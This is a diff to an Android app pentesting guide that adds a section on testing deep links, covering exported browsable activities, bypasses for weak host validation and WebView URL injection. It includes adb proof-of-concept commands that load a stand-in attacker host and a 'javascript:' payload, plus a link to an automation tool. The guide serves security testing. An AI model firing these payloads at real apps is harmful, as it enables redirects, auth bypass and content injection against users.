Deep-C

src/mobile-pentesting/android-app-pentesting/android-applications-basics.md

@@ -231,6 +231,31 @@ In order to find the **code that will be executed in the App**, go to the activi
 
 Learn how to [call deep links without using HTML pages](#exploiting-schemes-deep-links).
 
+### Deep link security testing & adb PoCs
+
+- **Entry point discovery**: exported Activities that declare **`<action android:name="android.intent.action.VIEW" />` + `<category android:name="android.intent.category.BROWSABLE" />`** are remotely reachable via crafted URIs (custom schemes or `http/https` App Links). Prioritise paths containing **login/reset/payment/wallet/admin** keywords.
+- **Validation bypass heuristics**: weak host checks such as `endsWith()`, `contains()`, permissive regexes, or substring allowlists can usually be bypassed with attacker-controlled subdomains, prefix/suffix tricks, and URL/UTF‑8 double-encoding.
+- **WebView sinks**: if the handler forwards the incoming URI or query params to `WebView.loadUrl(...)`, you can coerce the app to render arbitrary attacker content. If scheme validation is weak, try **`javascript:`** payloads as well as external `https://` URLs.
+- **adb PoC templates** (implicit vs explicit):
+
+```bash
+# Generic implicit VIEW (custom scheme or App Link)
+adb shell am start -a android.intent.action.VIEW \
+  -d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+
+# Explicitly target a specific Activity
+adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
+  -d "myapp://host/path?redirect=https://attacker.tld"
+
+# Try javascript: when scheme filters are lax
+adb shell am start -a android.intent.action.VIEW \
+  -d "myapp://host/web?url=javascript:alert(1)"
+```
+
+- **Operational tips**: capture multiple payload variants (external URL vs `javascript:`) and replay them quickly against a device/emulator to distinguish real issues (open-redirect/auth-bypass/WebView URL injection) from static-analysis noise.
+- **Automation**: [Deep-C](https://github.com/KishorBal/deep-C) automates deeplink hunting by decompiling the APK (apktool + dex2jar + jadx), enumerating **exported + browsable** activities, correlating weak validation and `WebView.loadUrl` flows, and emitting ready-to-run adb PoCs (optionally auto-executed with `--exec`).
+
+
 ## AIDL - Android Interface Definition Language
 
 The **Android Interface Definition Language (AIDL)** is designed for facilitating communication between client and service in Android applications through **interprocess communication** (IPC). Since accessing another process's memory directly is not permitted on Android, AIDL simplifies the process by marshalling objects into a format understood by the operating system, thereby easing communication across different processes.
@@ -511,6 +536,7 @@ Tools / scripts that speed-up Binder reconnaissance:
 - [Android manifest provider: readPermission](https://developer.android.com/guide/topics/manifest/provider-element#rprmsn)
 - [Android manifest provider: writePermission](https://developer.android.com/guide/topics/manifest/provider-element#wprmsn)
 - [Android ContentResolver.update()](https://developer.android.com/reference/android/content/ContentResolver#update(android.net.Uri,%20android.content.ContentValues,%20java.lang.String,%20java.lang.String[]))
+- [Deep-C – Android deep link exploitation framework](https://github.com/KishorBal/deep-C)
 
 {{#include ../../banners/hacktricks-training.md}}